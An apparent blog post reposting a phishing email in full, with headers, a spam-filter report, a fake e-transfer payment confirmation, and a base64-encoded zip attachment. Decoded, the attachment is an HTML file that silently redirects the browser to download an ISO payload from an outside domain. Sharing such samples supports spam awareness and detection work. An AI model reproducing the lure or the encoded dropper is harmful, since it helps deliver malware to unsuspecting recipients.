payment phish

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Fri, 16 Sep 2022 11:35:01 -0600

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.95 (FreeBSD))

(envelope-from )

id 1oZFDF-0006cw-RM

for dave@doctor.nl2k.ab.ca;

Fri, 16 Sep 2022 11:33:13 -0600

Resent-From: The Doctor

Resent-Date: Fri, 16 Sep 2022 11:33:13 -0600

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from smtp108.ord1d.emailsrvr.com ([184.106.54.108]:42473)

by doctor.nl2k.ab.ca with esmtps (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384

(Exim 4.95 (FreeBSD))

(envelope-from )

id 1oZD9E-0005sg-5P

for doctor@nl2k.ab.ca;

Fri, 16 Sep 2022 09:21:00 -0600

DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple;

d=oldtown-guesthouse.com; s=20200515-4eovi7wq; t=1663341631;

bh=NReo46jhu3Fs8SffKblTsF9TZCB1yYx01JxNqL1OyKA=;

h=From:Subject:Date:From;

b=JurG5IFpuss3JCYAskxOzLfIrvi8wMgZSRXwIwRkNBulor2KIBRM4wfnUYfcLNuvW

GfeG/tMkEXMYwhkEu/2n93katuZEQsbRodj5U6820U8Hj7l/nc6XiRTcA1WnxsfAjW

rZz82lhXtnf/uyTv3Nhlu5buKn5G6aZuk3d1KSlE=

X-Auth-ID: relax@oldtown-guesthouse.com

Received: by smtp6.relay.ord1d.emailsrvr.com (Authenticated sender: relax-AT-oldtown-guesthouse.com) with ESMTPA id 1CB90E01BA;

Fri, 16 Sep 2022 11:20:06 -0400 (EDT)

From: "Dira"

Subject: Payment Confirmation

Date: Fri, 16 Sep 2022 15:20:31 -0000

MIME-Version: 1.0

Content-Type: multipart/mixed;

boundary="----=_NextPart_000_0041_01C2A9A6.28AEF300"

X-Priority: 3

X-MSMail-Priority: Normal

X-Mailer: Microsoft Outlook Express 6.00.2600.0000

X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

X-Classification-ID: 67668e34-8958-419c-83fb-1be73876ae52-1-1

X-Spam_score: 12.9

X-Spam_score_int: 129

X-Spam_bar: ++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: Hello, Please acknowledge upon receipt of my today payment

via (e-transfer) Transaction ID #: RGJORB04DNYUPSH06GS



Content analysis details: (12.9 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was

blocked. See

http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block

for more information.

[URIs: oldtown-guesthouse.com]

-0.0 SPF_PASS SPF: sender matches SPF record

1.2 MISSING_HEADERS Missing To: header

2.4 RAZOR2_CF_RANGE_E8_51_100 Razor2 gives engine 8 confidence level

above 50%

[cf: 100]

1.7 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)

0.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%

[cf: 100]

0.0 FROM_MISSP_XPRIO Misspaced FROM + X-Priority

-0.0 T_SCC_BODY_TEXT_LINE No description available.

0.1 MISSING_MID Missing Message-Id: header

0.0 AXB_XMAILER_MIMEOLE_OL_024C2 Yet another X header trait

0.0 T_DKIM_INVALID DKIM-Signature header exists but is not valid

0.0 FROM_MISSP_MSFT From misspaced + supposed Microsoft tool

3.5 MALW_ATTACH Attachment filename suspicious, probable malware

exploit

0.7 TO_NO_BRKTS_FROM_MSSP Multiple formatting errors

0.0 FROM_MISSPACED From: missing whitespace

2.8 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook

Subject: {SPAM?} Payment Confirmation



This is a multi-part message in MIME format.



------=_NextPart_000_0041_01C2A9A6.28AEF300

Content-Type: text/plain;

charset="Windows-1251"

Content-Transfer-Encoding: 7bit



Hello,



Please acknowledge upon receipt of my today

payment via (e-transfer)



Transaction ID #: RGJORB04DNYUPSH06GS



Thanks...



------=_NextPart_000_0041_01C2A9A6.28AEF300

Content-Type: application/x-zip-compressed;

name="RGJORB04DNYUPSH06GS_pdf.zip"

Content-Transfer-Encoding: base64

Content-Disposition: attachment;

filename="RGJORB04DNYUPSH06GS_pdf.zip"



UEsDBBQAAAAAAHp3MFXO4DBXaAAAAGgAAAAcAAAAUkdKT1JCMDRETllVUFNI

MDZHU19wZGYuSFRNTDxib2R5IG9ubG9hZD0iamF2YXNjcmlwdDp3aW5kb3cu

bG9jYXRpb24uaHJlZj0naHR0cHM6Ly90cmFjay1kaHNlcnZpY2VzLmNvbS9S

R0pPUkIwNEROWVVQU0gwNkdTLklTTyc7Ij4KUEsBAhQAFAAAAAAAencwVc7g

MFdoAAAAaAAAABwAAAAAAAAAAQAgAAAAAAAAAFJHSk9SQjA0RE5ZVVBTSDA2

R1NfcGRmLkhUTUxQSwUGAAAAAAEAAQBKAAAAogAAAAAA



------=_NextPart_000_0041_01C2A9A6.28AEF300--

Trackbacks

Trackback specific URI for this entry

This link is not meant to be clicked. It contains the trackback URI for this entry. You can use this URI to send ping- & trackbacks from your own blog to this entry. To copy the link, right click and select "Copy Shortcut" in Internet Explorer or "Copy Link Location" in Mozilla.

No Trackbacks

Comments

Display comments as Linear | Threaded

No comments

Add Comment

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA

Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.

To prevent automated Bots from commentspamming, please enter the string you see in the image below in the appropriate input box. Your comment will only be submitted if the strings match. Please ensure that your browser supports and accepts cookies, or your comment cannot be verified correctly.
CAPTCHA